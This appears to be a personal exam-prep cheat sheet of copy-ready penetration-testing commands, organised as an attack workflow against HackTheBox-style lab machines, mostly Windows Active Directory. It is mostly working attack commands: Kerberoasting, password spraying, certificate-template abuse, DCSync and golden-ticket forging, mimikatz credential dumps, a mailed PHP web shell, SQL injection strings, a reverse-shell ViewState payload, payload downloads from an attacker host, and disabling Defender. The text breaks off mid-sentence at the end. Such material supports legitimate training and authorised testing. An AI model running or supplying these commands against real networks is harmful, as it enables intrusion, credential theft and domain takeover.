most-used-commands.md (28484B)
1 --- 2 title: "Most Used Commands" 3 description: "CPTS companion guide: Most Used Commands — copy-ready methodology and commands." 4 category: pentest-workflow 5 subcategory: "Companion Guides" 6 order: 23 7 tags: ["command-reference", "cheatsheet", "cpts-prep", "ad", "adcs", "kerberos", "enumeration", "privilege-escalation", "cpts", "pentest-workflow"] 8 tools: ["nmap", "rustscan", "netexec", "bloodhound-ce-python", "certipy", "impacket", "bloodyAD", "evil-winrm", "hashcat"] 9 difficulty: intermediate 10 updated: "2026-07-18" 11 source: "vault:Pentest Attack Flow/Companion Guides/Most-Used-Commands.md" 12 --- 13 --- 14 15 > [!abstract] `> ABOUT_THIS_NOTE` 16 > Master command library merged from my scanning cheatsheet and AD field notes. Ordered as an **attack workflow** first, then a per-tool reference. Built around the CPTS-prep box list (mostly Windows/AD), so Kerberos, ADCS and ACL abuse lead. For the phased methodology and decision trees, see **[Attack-Flow-Guide](/sheets/pentest-workflow/attack-flow-guide)**. Set `export TARGET=`, `export IP=$TARGET`, `export DC=dc01.domain.htb` and `export DOMAIN=domain.htb` before starting. 17 18 --- 19 20 ## // ATTACK_WORKFLOW 21 22 The order I actually work a box. Windows/AD path is the spine, web/Linux detours branch off recon. 23 24 <figure class="flow plate corners"> 25 <figcaption class="flow__cap"><span class="flow__kind">Box attack workflow</span><span class="flow__dir">TD</span></figcaption> 26 <div class="flow__body"> 27 <div class="flow__diagram" data-dir="td"> 28 <div class="flow-rank"><div class="flow-node is-entry">0. SETUP<span class="sub">hosts + krb5 + ntpdate</span></div></div> 29 <div class="flow-edge"></div> 30 <div class="flow-rank"><div class="flow-node">1. RECON<span class="sub">rustscan / nmap</span></div></div> 31 <div class="flow-edge"></div> 32 <div class="flow-rank"><div class="flow-node is-decision">Attack surface?</div></div> 33 <div class="flow-branches"> 34 <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">AD / SMB / LDAP</span></div><div class="flow-node">2. AD ENUM<span class="sub">netexec + bloodhound-ce-python</span></div></div> 35 <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">Web</span></div><div class="flow-node">Web: ffuf / sqlmap / LFI</div></div> 36 <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">Linux svc</span></div><div class="flow-node">Linux: NFS / DNS / redis</div></div> 37 </div> 38 <div class="flow-join"></div> 39 <div class="flow-rank"><div class="flow-node">3. FOOTHOLD CREDS<span class="sub">kerberoast / asrep / shares / spray</span></div></div> 40 <div class="flow-edge"></div> 41 <div class="flow-rank"><div class="flow-node">4. BLOODHOUND PATH<span class="sub">ACLs: GenericWrite / ForceChangePW</span></div></div> 42 <div class="flow-edge"></div> 43 <div class="flow-rank"><div class="flow-node">5. ESCALATE ID<span class="sub">shadow creds / gMSA / DPAPI / recycle bin</span></div></div> 44 <div class="flow-edge"></div> 45 <div class="flow-rank"><div class="flow-node is-decision">Path to DA?</div></div> 46 <div class="flow-branches"> 47 <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">ADCS</span></div><div class="flow-node">6a. CERTIPY<span class="sub">ESC1 / ESC8 / ESC15 / ESC16</span></div></div> 48 <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">Delegation</span></div><div class="flow-node">6b. RBCD / constrained<span class="sub">impacket getST</span></div></div> 49 <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">Creds/priv</span></div><div class="flow-node">6c. SeImpersonate / SeDebug<span class="sub">secretsdump / DCSync</span></div></div> 50 </div> 51 <div class="flow-join"></div> 52 <div class="flow-rank"><div class="flow-node is-goal">7. DOMAIN ADMIN<span class="sub">evil-winrm / psexec</span></div></div> 53 </div> 54 </div> 55 </figure> 56 57 > [!tip] (what to do first, then again) 58 > 1. **Every time you get new creds or a new hash** → re-run BloodHound as that principal, re-spray across SMB/WinRM, and re-check ADCS with certipy. New identity = new outbound control. 59 > 2. **Every shell** → run the "First 5 Commands" for the OS immediately (`whoami /all` / `sudo -l`). 60 > 3. **Kerberos error?** → 99% clock skew. Re-run `ntpdate`. See Phase 0. 61 > 4. **Stuck on privesc** → enumerate again with the *new* context; upload BloodHound/winPEAS/linPEAS; check `whoami /priv`. 62 63 --- 64 65 ## // MACHINE_→_TECHNIQUE_INDEX 66 67 Quick map of the CPTS-prep list to the primary skill each one drills (so I know which section to revise). 68 69 | Box | OS · Diff | Primary technique(s) | Key tools | 70 |-----|-----------|----------------------|-----------| 71 | **Fluffy** | Win · Easy | CVE-2025-24071 `.library-ms` → NetNTLMv2 → GenericWrite → shadow creds → **ESC16** | responder, hashcat, bloodyAD, certipy | 72 | **Jeeves** | Win · Med | Jenkins RCE → KeePass `.kdbx` crack → PtH → ADS root | keepass2john, psexec | 73 | **Trick** | Linux · Easy | DNS **AXFR** → SQLi auth bypass → LFI → **fail2ban** privesc | dig, sqlmap | 74 | **Postman** | Linux · Easy | **Redis** unauth → SSH key write → Webmin RCE (CVE-2019-12840) | redis-cli, ssh2john | 75 | **Pov** | Win · Med | LFI → web.config keys → **ViewState** deser → PSCredential → **SeDebug** | ysoserial.net | 76 | **TombWatcher** | Win · Med | Kerberoast → **gMSA** → ForceChangePassword → **AD Recycle Bin** → **ESC15** | certipy, bloodyAD, gMSADumper | 77 | **Media** | Win · Med | `.wax` **NTLM leak** → crack → junction point web write → **GodPotato** (SeImpersonate) | responder, GodPotato, FullPowers | 78 | **VulnCicada** | Win · Med | NFS stickynote → **ESC8** → malicious DNS + **PetitPotam** → certipy relay | certipy, coercer, nfs | 79 | **StreamIO** | Win · Med | **MSSQL SQLi** → LFI/RFI → ACL abuse → Firefox creds → **LAPS** read | sqlmap, bloodhound, nxc | 80 | **Voleur** | Win · Med | Kerberos-only auth (ccache) → Kerberoast → **deleted object** recovery → **DPAPI** → NTDS | impacket-getTGT, secretsdump, dpapi | 81 | **Administrator** | Win · Med | ACL chains → ForceChangePassword → GenericAll → **DCSync** | bloodyAD, secretsdump | 82 | **Authority** | Win · Med | **Ansible Vault** crack → PWM LDAP intercept → **ESC1** → PassTheCert | ansible2john, certipy, passthecert | 83 | **Craft** | Linux · Med | API abuse → Gogs source → python **eval** RCE → **Vault** SSH OTP | curl, jq | 84 | **Redelegate** | Win · Hard | anon FTP → KeePass spray → ForceChangePassword → **constrained delegation** (SeEnableDelegation) → DCSync | keepass2john, impacket-getST | 85 | **Snoopy** | Linux · Hard | DNS **AXFR** → LFI → BIND TSIG key → **nsupdate** → Mattermost reset → git/clamav CVE | dig, nsupdate | 86 | **Ghost** | Win · Insane | vhost fuzz → **LDAP injection** → Gitea → RCE → gMSA → **Golden SAML** → forest trust golden ticket | ffuf, ticketer | 87 88 > [!note] Pattern: 12 of 16 are Windows/AD. Master certipy (ESC1/8/15/16), BloodHound ACL abuse, Kerberos ticket handling, and delegation and you clear most of this list. 89 90 --- 91 92 ## // PHASE_0 — SETUP (do this first, every AD box) 93 94 > [!warning] — the #1 Kerberos killer 95 > Kerberos rejects auth if your clock differs from the DC by more than ~5 min. Sync **before** any Kerberos/certipy/getTGT step, and again if a box's time drifts. 96 > ```bash 97 > sudo ntpdate -u $TARGET # classic, quickest 98 > # if ntpdate is missing: 99 > sudo apt install ntpdate -y 100 > # modern alternatives: 101 > sudo rdate -n $TARGET 102 > sudo chronyd -q "server $TARGET iburst" 103 > # verify skew vs DC: 104 > nxc smb $TARGET | grep -i time 105 > ``` 106 107 > [!terminal]+ Hosts file + Kerberos realm 108 > ```bash 109 > # Auto-populate /etc/hosts with DC + domain 110 > sudo nxc smb $TARGET --generate-hosts-file /etc/hosts 111 > 112 > # Generate a matching krb5.conf (needed for Kerberos auth) 113 > nxc smb $DC --generate-krb5-file krb5.conf 114 > sudo cp krb5.conf /etc/krb5.conf 115 > 116 > # Manual fallback 117 > echo "$TARGET dc01.domain.htb domain.htb dc01" | sudo tee -a /etc/hosts 118 > ``` 119 120 ```bash 121 nxc smb $TARGET --generate-host-file hosts 122 cat hosts | sudo tee -a /etc/hosts+ 123 ``` 124 125 --- 126 127 ## // PHASE_1 — RECON & SCANNING 128 129 > [!terminal]+ RustScan (preferred) then two-stage nmap 130 > ```bash 131 > # RustScan auto-feeds open ports into nmap 132 > rustscan -a $IP -u 50000 -r 1-65535 -- -sCV -oA ./recon/target 133 > # Windows / no-ping targets 134 > rustscan -a $IP -u 50000 -r 1-65535 -t 3000 -b 1000 -- -Pn -sCV --max-retries 3 -T4 135 > 136 > # Two-stage nmap: discover ports, then deep scan 137 > ports=$(nmap -p- --min-rate=1000 -T4 --open -oG - $IP | grep -oP '\d+(?=/open)' | paste -sd,) 138 > nmap -p $ports -sCV -T4 -Pn $IP -oA ./recon/detailed 139 > 140 > # Vuln scripts (high-severity only) 141 > nmap -sV --script "vuln,vulners" --script-args mincvss=7.0 -p $ports $IP -oA ./recon/vuln 142 > ``` 143 144 > [!tip] UDP quick check (DNS/SNMP/NFS often matter): `sudo nmap -sU --top-ports 50 $IP` 145 146 --- 147 148 ## // PHASE_2 — ENUMERATION 149 150 ### `> SMB` 151 152 > [!terminal]+ 153 > ```bash 154 > nxc smb $TARGET -u '' -p '' --shares # null session 155 > nxc smb $TARGET -u guest -p '' --shares 156 > smbmap -H $TARGET -u user -p 'pass' -r # recursive listing 157 > smbclient //$TARGET/Share -U 'domain\user%pass' 158 > smbclient -N -L //$TARGET # anon share list 159 > nxc smb $TARGET -u user -p 'pass' -M spider_plus # loot files 160 > ``` 161 162 ### `> LDAP / RID / users` 163 164 > [!terminal]+ 165 > ```bash 166 > nxc ldap $DC -u user -p 'pass' --users-export users.txt 167 > nxc smb $TARGET -u user -p 'pass' --rid-brute 168 > ldapsearch -x -H ldap://$TARGET -b 'DC=domain,DC=htb' > ldap.txt 169 > enum4linux-ng -A $TARGET 170 > ``` 171 172 ### `> Kerberos user discovery` 173 174 > [!terminal]+ 175 > ```bash 176 > kerbrute userenum -d $DOMAIN --dc $DC /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt 177 > ``` 178 179 ### `> NFS (VulnCicada-style)` 180 181 > [!terminal]+ 182 > ```bash 183 > showmount -e $TARGET 184 > sudo mount -t nfs $TARGET:/share /mnt/nfs -o nolock 185 > ``` 186 187 ### `> BloodHound (run as EVERY new principal)` 188 189 > [!terminal]+ bloodhound-ce-python (CE ingestor) 190 > ```bash 191 > bloodhound-ce-python -d $DOMAIN -u user -p 'pass' -ns $TARGET -c All --zip 192 > # Kerberos auth instead of password: 193 > bloodhound-ce-python -d $DOMAIN -u user -k -no-pass -ns $TARGET -c All --zip 194 > # On-target collector (Windows): 195 > # .\SharpHound.exe -c All --outputdirectory C:\temp 196 > ``` 197 > Then start the CE stack (`docker compose up`), upload the zip, mark owned, run **"Shortest paths from Owned"**. 198 199 --- 200 201 ## // PHASE_3 — CREDENTIAL ATTACKS (AD) 202 203 ### `> Kerberoast + ASREPRoast` 204 205 > [!terminal]+ 206 > ```bash 207 > # Kerberoast (SPN accounts) → hashcat -m 13100 208 > impacket-GetUserSPNs -request -dc-ip $DC "$DOMAIN/user:pass" -outputfile kerb.hash 209 > # targeted (when you have GenericWrite over a user) 210 > targetedKerberoast.py -v -d $DOMAIN -u user -p 'pass' 211 > 212 > # ASREPRoast (no pre-auth) → hashcat -m 18200 213 > impacket-GetNPUsers $DOMAIN/ -dc-ip $DC -usersfile users.txt -no-pass 214 > ``` 215 216 ### `> Password spray (after any new password)` 217 218 > [!terminal]+ 219 > ```bash 220 > nxc smb $TARGET -u users.txt -p 'Season2025!' --continue-on-success 221 > nxc winrm $TARGET -u users.txt -p 'Password1' --continue-on-success 222 > kerbrute passwordspray -d $DOMAIN --dc $DC users.txt 'Welcome1' 223 > ``` 224 225 ### `> ACL abuse (bloodyAD)` 226 227 > [!terminal]+ 228 > ```bash 229 > # Add self to a group (GenericAll/GenericWrite over group) 230 > bloodyAD --host $DC -d $DOMAIN -u user -p 'pass' add groupMember 'Target Group' user 231 > # Force-change another user's password (ForceChangePassword) 232 > bloodyAD --host $DC -d $DOMAIN -u user -p 'pass' set password targetuser 'NewP@ss123!' 233 > # Grant DCSync (WriteDacl on domain) 234 > bloodyAD --host $DC -d $DOMAIN -u user -p 'pass' add dcsync user 235 > ``` 236 237 ### `> Shadow Credentials (GenericWrite over a user → NT hash)` 238 239 > [!terminal]+ 240 > ```bash 241 > certipy shadow auto -u user@$DOMAIN -p 'pass' -account targetuser 242 > # -> returns TGT (.ccache) AND the NT hash for targetuser 243 > ``` 244 245 ### `> gMSA password read (TombWatcher/Ghost)` 246 247 > [!terminal]+ 248 > ```bash 249 > nxc ldap $DC -u user -p 'pass' --gmsa 250 > gMSADumper.py -u user -p 'pass' -d $DOMAIN 251 > bloodyAD --host $DC -d $DOMAIN -u user -p 'pass' get object 'svc_gmsa$' --attr msDS-ManagedPassword 252 > ``` 253 254 ### `> DPAPI (Voleur)` 255 256 > [!terminal]+ 257 > ```bash 258 > impacket-dpapi masterkey -file masterkey -sid <SID> -password 'pass' 259 > impacket-dpapi credential -file <cred_blob> -key <decrypted_masterkey> 260 > nxc smb $TARGET -u user -p 'pass' --dpapi 261 > ``` 262 263 ### `> Deleted object / AD Recycle Bin (TombWatcher/Voleur)` 264 265 > [!terminal]+ 266 > ```powershell 267 > Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects 268 > Restore-ADObject -Identity <GUID> 269 > ``` 270 271 ### `> Coercion (VulnCicada — feeds ESC8/relay)` 272 273 > [!terminal]+ 274 > ```bash 275 > coercer coerce -u user -p 'pass' -d $DOMAIN -t $DC -l $LHOST 276 > petitpotam.py -u user -p 'pass' -d $DOMAIN $LHOST $DC 277 > ``` 278 279 ### `> Delegation — RBCD & constrained (Redelegate)` 280 281 > [!terminal]+ 282 > ```bash 283 > # Constrained delegation w/ SeEnableDelegationPrivilege → S4U impersonation 284 > impacket-getST -spn 'cifs/dc01.domain.htb' -impersonate administrator \ 285 > -dc-ip $DC "$DOMAIN/FS01\$:MachinePass" 286 > export KRB5CCNAME=administrator.ccache 287 > 288 > # RBCD (GenericWrite/GenericAll over a computer) 289 > impacket-rbcd -delegate-from 'ATTACKER$' -delegate-to 'TARGET$' -action write \ 290 > "$DOMAIN/user:pass" 291 > ``` 292 293 --- 294 295 ## // PHASE_6a — ADCS / CERTIPY (ESC1 / ESC8 / ESC15 / ESC16) 296 297 > [!terminal]+ Find (update certipy first — ESC16 is recent) 298 > ```bash 299 > uv tool upgrade certipy-ad 300 > certipy find -u user@$DOMAIN -p 'pass' -dc-ip $DC -vulnerable -stdout 301 > # with a hash: 302 > certipy find -u user@$DOMAIN -hashes :<NT> -dc-ip $DC -vulnerable -stdout 303 > ``` 304 305 > [!terminal]+ ESC1 — enrollee supplies SAN (Authority) 306 > ```bash 307 > certipy req -u user@$DOMAIN -p 'pass' -dc-ip $DC -target $DC \ 308 > -ca CA-NAME -template VulnTemplate -upn administrator@$DOMAIN 309 > certipy auth -pfx administrator.pfx -dc-ip $DC 310 > ``` 311 312 > [!terminal]+ ESC8 — NTLM relay to web enrollment (VulnCicada) 313 > ```bash 314 > certipy relay -target 'http://$DC' -template DomainController 315 > # then coerce the DC (PetitPotam/coercer) → cert as DC$ → DCSync 316 > ``` 317 318 > [!terminal]+ ESC15 (CVE-2024-49019) — v1 template app-policy injection (TombWatcher) 319 > ```bash 320 > certipy req -u user@$DOMAIN -p 'pass' -dc-ip $DC -ca CA-NAME -template WebServer \ 321 > -upn administrator@$DOMAIN -application-policies 'Client Authentication' 322 > ``` 323 324 > [!terminal]+ ESC16 — security extension disabled globally (Fluffy) 325 > ```bash 326 > # 1. hijack a controlled account's UPN to the target 327 > certipy account -u ctrl@$DOMAIN -hashes :<NT> -user ca_svc -upn administrator update 328 > # 2. request as that account 329 > certipy req -u ca_svc -hashes :<NT> -dc-ip $DC -target $DC -ca CA-NAME -template User 330 > # 3. restore UPN, then auth 331 > certipy account -u ctrl@$DOMAIN -hashes :<NT> -user ca_svc -upn ca_svc@$DOMAIN update 332 > certipy auth -pfx administrator.pfx -dc-ip $DC -domain $DOMAIN 333 > ``` 334 335 > [!tip] PassTheCert (when the PFX can't get a TGT but can LDAP-bind — Authority) 336 > ```bash 337 > python3 passthecert.py -action ldap-shell -crt admin.crt -key admin.key -domain $DOMAIN -dc-ip $DC 338 > ``` 339 340 --- 341 342 ## // CRACKING 343 344 > [!example] 345 > | Hash | Mode | Command | 346 > |---|---|---| 347 > | NetNTLMv2 (Responder) | 5600 | `hashcat -m 5600 hash rockyou.txt` | 348 > | Kerberoast TGS | 13100 | `hashcat -m 13100 kerb.hash rockyou.txt` | 349 > | ASREPRoast | 18200 | `hashcat -m 18200 hash rockyou.txt` | 350 > | NTLM (raw) | 1000 | `hashcat -m 1000 hash rockyou.txt` | 351 > | NetNTLMv1 | 5500 | `hashcat -m 5500 hash rockyou.txt` | 352 > | DCC2 (cached) | 2100 | `hashcat -m 2100 hash rockyou.txt` | 353 > | KeePass | 13400 | `hashcat -m 13400 keepass.hash rockyou.txt` | 354 > | Not sure? | — | `hashcat --identify hash` | 355 356 > [!terminal]+ `*2john` extractors (Jeeves / Authority / Postman / Redelegate) 357 > ```bash 358 > keepass2john Database.kdbx > keepass.hash # KeePass 359 > ansible2john vault.yml > vault.hash # Ansible Vault 360 > ssh2john id_rsa > id_rsa.hash # encrypted SSH key 361 > john --wordlist=/usr/share/wordlists/rockyou.txt <hash> 362 > ``` 363 364 > [!terminal]+ Python hash one-liners (NTLM etc) 365 > ```bash 366 > python3 -c "import hashlib; print(hashlib.new('md4', input('Pass: ').encode('utf-16le')).hexdigest())" # NTLM 367 > ``` 368 369 --- 370 371 ## // SHELLS & LATERAL MOVEMENT 372 373 > [!terminal]+ evil-winrm (password / hash / Kerberos ccache) 374 > ```bash 375 > evil-winrm -i $IP -u user -p 'pass' 376 > evil-winrm -i $IP -u administrator -H <NT_HASH> # pass-the-hash 377 > export KRB5CCNAME=administrator.ccache 378 > evil-winrm -i $IP -r $DOMAIN # Kerberos (needs FQDN in /etc/hosts) 379 > # in-session: upload/download, Bypass-4MSI, services 380 > ``` 381 382 > [!terminal]+ impacket remote exec (PtH-friendly) 383 > ```bash 384 > impacket-psexec "$DOMAIN/administrator:pass@$IP" # SYSTEM, noisy (service) 385 > impacket-wmiexec -hashes :<NT> administrator@$IP # stealthier 386 > impacket-smbexec "$DOMAIN/administrator:pass@$IP" 387 > impacket-atexec -hashes :<NT> administrator@$IP "whoami" # via scheduler 388 > ``` 389 390 > [!terminal]+ netexec spray & command 391 > ```bash 392 > nxc smb $IP/24 -u user -p 'pass' -d $DOMAIN # spray subnet 393 > nxc smb $IP -d . -u administrator -H <NT> # -d . = LOCAL account 394 > nxc winrm $IP -u user -p 'pass' -x "whoami" # (Pwn3d!) = admin 395 > ``` 396 397 --- 398 399 ## // CREDENTIAL DUMPING 400 401 > [!terminal]+ impacket-secretsdump (SAM / LSA / NTDS / DCSync) 402 > ```bash 403 > impacket-secretsdump "$DOMAIN/user:pass@$IP" # local SAM+LSA 404 > impacket-secretsdump -hashes :<NT> administrator@$IP # PtH 405 > impacket-secretsdump "$DOMAIN/administrator:pass@$DC" -just-dc # full DCSync (NTDS) 406 > impacket-secretsdump "$DOMAIN/administrator:pass@$DC" -just-dc-user krbtgt 407 > ``` 408 > Output format: `user:RID:LMhash:NThash:::` → the **NT hash** (last) is what you PtH. 409 410 > [!terminal]+ mimikatz / meterpreter kiwi (on-target, needs SYSTEM) 411 > ``` 412 > privilege::debug 413 > sekurlsa::logonpasswords 414 > lsadump::sam 415 > lsadump::dcsync /user:domain\administrator 416 > sekurlsa::pth /user:administrator /domain:domain.htb /ntlm:<NT> /run:cmd.exe 417 > ``` 418 419 --- 420 421 ## // WINDOWS PRIVESC 422 423 > [!terminal]+ First 5 commands (run on every Windows shell) 424 > ```powershell 425 > whoami /all # user, groups AND privileges (SeImpersonate/SeDebug/SeBackup) 426 > net user; net localgroup administrators 427 > systeminfo # build + hotfixes + domain 428 > ipconfig /all # pivot subnets 429 > whoami /priv 430 > ``` 431 432 > [!tip]+ Privilege → exploit map 433 > - **SeImpersonate** → GodPotato / PrintSpoofer (`FullPowers` first if svc account) — *Media* 434 > - **SeDebug** → inject LSASS / meterpreter migrate — *Pov* 435 > - **SeBackup / SeRestore** → read/write any file (dump SAM/NTDS) 436 > - **SeEnableDelegation** → constrained delegation S4U — *Redelegate* 437 > ```powershell 438 > .\GodPotato-NET4.exe -cmd "cmd /c whoami" 439 > .\PrintSpoofer64.exe -i -c powershell 440 > ``` 441 442 > [!terminal]+ Web-specific footholds 443 > ```bash 444 > # ViewState deserialization (Pov): leak web.config keys via LFI, then: 445 > ysoserial.exe -p ViewState -g TextFormattingRunProperties \ 446 > --generator=<__VIEWSTATEGENERATOR> --validationkey=<KEY> --validationalg=SHA1 \ 447 > -c "cmd" 448 > # LAPS read (StreamIO): 449 > nxc ldap $DC -u user -p 'pass' -M laps 450 > ``` 451 452 --- 453 454 ## // LINUX PRIVESC 455 456 > [!terminal]+ First commands + quick wins 457 > ```bash 458 > whoami && id 459 > sudo -l # check FIRST 460 > find / -perm -u=s -type f 2>/dev/null # SUID → GTFOBins 461 > cat /etc/crontab; ls -la /etc/cron.* 462 > curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh 463 > # TTY upgrade 464 > python3 -c 'import pty; pty.spawn("/bin/bash")' # then Ctrl+Z; stty raw -echo; fg 465 > ``` 466 467 > [!terminal]+ DNS attacks (Trick / Snoopy) 468 > ```bash 469 > dig axfr @$TARGET domain.htb # zone transfer → subdomains 470 > # nsupdate with leaked TSIG key (Snoopy) 471 > nsupdate -k Kkey.private 472 > > update add mail.domain.htb 60 A $LHOST 473 > > send 474 > ``` 475 476 --- 477 478 ## // PIVOTING 479 480 > [!terminal]+ ligolo-ng (preferred) / chisel 481 > ```bash 482 > # ligolo-ng (agentless-feel, TUN based) 483 > sudo ip tuntap add user $USER mode tun ligolo; sudo ip link set ligolo up 484 > ./proxy -selfcert # attacker 485 > ./agent -connect $LHOST:11601 -ignore-cert # target 486 > 487 > # chisel reverse SOCKS 488 > ./chisel server -p 8000 --reverse # attacker 489 > ./chisel client $LHOST:8000 R:socks # target 490 > ``` 491 492 --- 493 494 ## // FILE TRANSFER 495 496 > [!terminal]+ 497 > ```bash 498 > # Attacker 499 > python3 -m http.server 80 500 > sudo impacket-smbserver SHARE . -smb2support -user t -password t 501 > # Windows target 502 > iwr -uri http://$LHOST/f.exe -outfile C:\temp\f.exe 503 > certutil -urlcache -f http://$LHOST/f.exe C:\temp\f.exe 504 > # Linux target 505 > wget http://$LHOST/x -O /tmp/x; curl http://$LHOST/x -o /tmp/x 506 > ``` 507 508 --- 509 510 ## // DOCUMENTATION (asciinema) 511 512 > [!terminal]+ 513 > ```bash 514 > asciinema rec ~/captures/$(date +%Y%m%d)_$TARGET.cast 515 > agg demo.cast demo.gif --idle-time-limit 2 --speed 2 # cast → gif 516 > sha256sum captures/* screenshots/* > evidence_$(date +%Y%m%d).txt 517 > ``` 518 519 --- 520 521 ## // WEB EXPLOITATION 522 523 > [!terminal]+ Recon (vhost + dirs + params) 524 > ```bash 525 > ffuf -u http://$IP -H "Host: FUZZ.domain.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac 526 > ffuf -u "http://target/admin/?FUZZ=" -w /opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt # hidden params (StreamIO debug) 527 > feroxbuster -u http://target -x php,aspx -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt # lowercase for IIS 528 > ``` 529 530 > [!terminal]+ SQL injection 531 > ```bash 532 > # auth bypass 533 > username: admin' or 1=1;-- - 534 > # sqlmap from a saved request (file read, dump) 535 > sqlmap -r login.req --batch --technique B --level 5 --threads 10 536 > sqlmap -r login.req --batch --file-read=/etc/passwd # read files 537 > sqlmap -r login.req --batch -D db -T users --dump 538 > # MSSQL union creds dump (StreamIO) 539 > ' union select 1,CONCAT(username,':',password),3,4,5,6 from users;-- - 540 > ``` 541 542 > [!terminal]+ LFI / file-read / poisoning (Trick, StreamIO) 543 > ```bash 544 > # str_replace('../') bypass: 545 > ?page=....//....//....//etc/passwd 546 > # PHP filter source leak: 547 > ?page=php://filter/convert.base64-encode/resource=index.php 548 > # mail poisoning: swaks --to user --body '<?php system($_REQUEST["cmd"]); ?>' --server $IP 549 > # then ?page=....//var/mail/user&cmd=id 550 > ``` 551 552 > [!terminal]+ ViewState deserialization (Pov) 553 > ```bash 554 > ysoserial.exe -p ViewState -g WindowsIdentity --decryptionalg="AES" \ 555 > --decryptionkey="<web.config key>" --validationalg="SHA1" --validationkey="<key>" \ 556 > --path="/portfolio" -c "powershell -e <b64 revshell>" 557 > # paste result into __VIEWSTATE POST param 558 > ``` 559 560 > [!tip] Known-software footholds: Jenkins script console (`println "cmd /c whoami".execute().text`), Gitea creds → source + commit history for leaked creds/keys, Redis unauth SSH-key write, Webmin CVE-2019-12840, python `eval` API (Craft), LDAP injection (`*`/`*`, brute attributes). 561 562 --- 563 564 ## // MSSQL 565 566 > [!terminal]+ Connect + enumerate + linked servers (Redelegate, Ghost, StreamIO) 567 > ```bash 568 > mssqlclient.py SQLGuest:pass@$DC # add -windows-auth for domain 569 > netexec mssql $DC -u sa -p pass --local-auth # spray, --local-auth for SQL logins 570 > # in the shell: 571 > enum_db ; enable_xp_cmdshell ; xp_cmdshell whoami 572 > # capture NetNTLMv2 via xp_dirtree (run Responder first) 573 > EXEC xp_dirtree '\\10.10.14.6\share' 574 > # linked-server impersonation → sa → RCE (Ghost) 575 > SELECT * FROM OPENQUERY("PRIMARY", 'select CURRENT_USER') 576 > EXECUTE('EXECUTE AS LOGIN=''sa''; exec sp_configure "xp_cmdshell",1; reconfigure; exec xp_cmdshell "cmd"') AT [PRIMARY] 577 > # RID-brute domain users through MSSQL (Redelegate) — see msf: auxiliary/admin/mssql/mssql_enum_domain_accounts 578 > ``` 579 580 --- 581 582 ## // ADFS GOLDEN SAML (Ghost) 583 584 > [!terminal]+ As the ADFS gMSA service account 585 > ```bash 586 > ADFSDump.exe # dump token-signing key + private key + config 587 > # format: private key -> binary, token key -> base64 -d 588 > python ADFSpoof.py -b encrypted_token_signing_key.bin private_key.bin -s core.domain \ 589 > saml2 --endpoint 'https://core.domain:8443/adfs/saml/postResponse' \ 590 > --nameidformat 'urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress' \ 591 > --nameid 'Administrator@domain' --rpidentifier 'https://core.domain:8443' \ 592 > --assertions '<Attribute Name="...upn"><AttributeValue>Administrator@domain</AttributeValue></Attribute>' 593 > # paste SAMLResponse into the /adfs/saml/postResponse POST 594 > ``` 595 596 --- 597 598 ## // CROSS-DOMAIN / FOREST (Ghost) 599 600 > [!terminal]+ Trust ticket & golden ticket 601 > ```bash 602 > # dump trust account + krbtgt (as SYSTEM on child DC) 603 > mimikatz "lsadump::dcsync /all /csv" exit 604 > # forged inter-domain trust ticket (child -> parent Enterprise Admins) 605 > ticketer.py -nthash <TRUST$ NT> -domain-sid <child SID> -domain child.dom \ 606 > -extra-sid <parent-SID>-519 -spn krbtgt/parent.dom dummy 607 > KRB5CCNAME=dummy.ccache getST.py -k -no-pass -spn cifs/dc01.parent.dom child.dom/dummy@parent.dom 608 > # or golden ticket with Rubeus 609 > Rubeus.exe golden /aes256:<krbtgt aes> /ldap /user:Administrator /sids:<parent-SID>-519 /ptt 610 > ``` 611 612 --- 613 614 ## // DNS ATTACKS (Trick, Snoopy) 615 616 > [!terminal]+ 617 > ```bash 618 > dig axfr domain.htb @$IP # zone transfer → subdomains 619 > # dynamic update with leaked TSIG/rndc key 620 > nsupdate -k rndc.key 621 > > server $IP 622 > > zone domain.htb 623 > > update add mail.domain.htb 86400 A 10.10.14.6 624 > > send 625 > # add DNS record as any domain user (feeds Responder coercion — Ghost) 626 > python dnstool.py -u domain\\user -k -a add -r bitbucket --zone domain.htb --data $LHOST -dns-ip $DC DC.domain.htb 627 > ``` 628 629 --- 630 631 ## // AD RECYCLE BIN / DELETED OBJECTS (TombWatcher, Voleur) 632 633 > [!terminal]+ 634 > ```powershell 635 > Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property objectSid,lastKnownParent 636 > Restore-ADObject -Identity <GUID> 637 > Set-ADAccountPassword <user> -NewPassword (ConvertTo-SecureString '0xdf0xdf!' -AsPlainText -Force) 638 > ``` 639 > ```bash 640 > # or via NetExec tombstone module (Voleur) 641 > nxc ldap $DC -u svc -p pw -k -M tombstone -o ACTION=query 642 > nxc ldap $DC -u svc -p pw -k -M tombstone -o ACTION=restore ID=<GUID> SCHEME=ldap 643 > ``` 644 645 --- 646 647 ## // WINDOWS PRIVESC — extras 648 649 > [!terminal]+ Potatoes, ADS, junctions (Media, Ghost, Jeeves) 650 > ```powershell 651 > # SeImpersonate: FullPowers restores stripped privs, then a potato 652 > .\FullPowers.exe -c 'cmd /c <payload>' -z 653 > .\GodPotato-NET4.exe -cmd "cmd /c <payload>" 654 > # if Defender eats GodPotato, compile EfsPotato on-box: 655 > C:\Windows\Microsoft.net\framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618 656 > Set-MpPreference -DisableRealtimeMonitoring $True # once you can 657 > # Alternate Data Stream (Jeeves) 658 > dir /R ; more < hm.txt:root.txt 659 > # junction point → make a service write into web root (Media) 660 > cmd /c mklink /J C:\target\dir C:\xampp\htdocs 661 > ``` 662 663 --- 664 665 ## // LINUX PRIVESC — extras (Postman, Trick, Craft, Snoopy) 666 667 > [!terminal]+ 668 > ```bash 669 > # sudo -l wins seen on the box list: 670 > # fail2ban action rewrite (Trick): edit actionban in 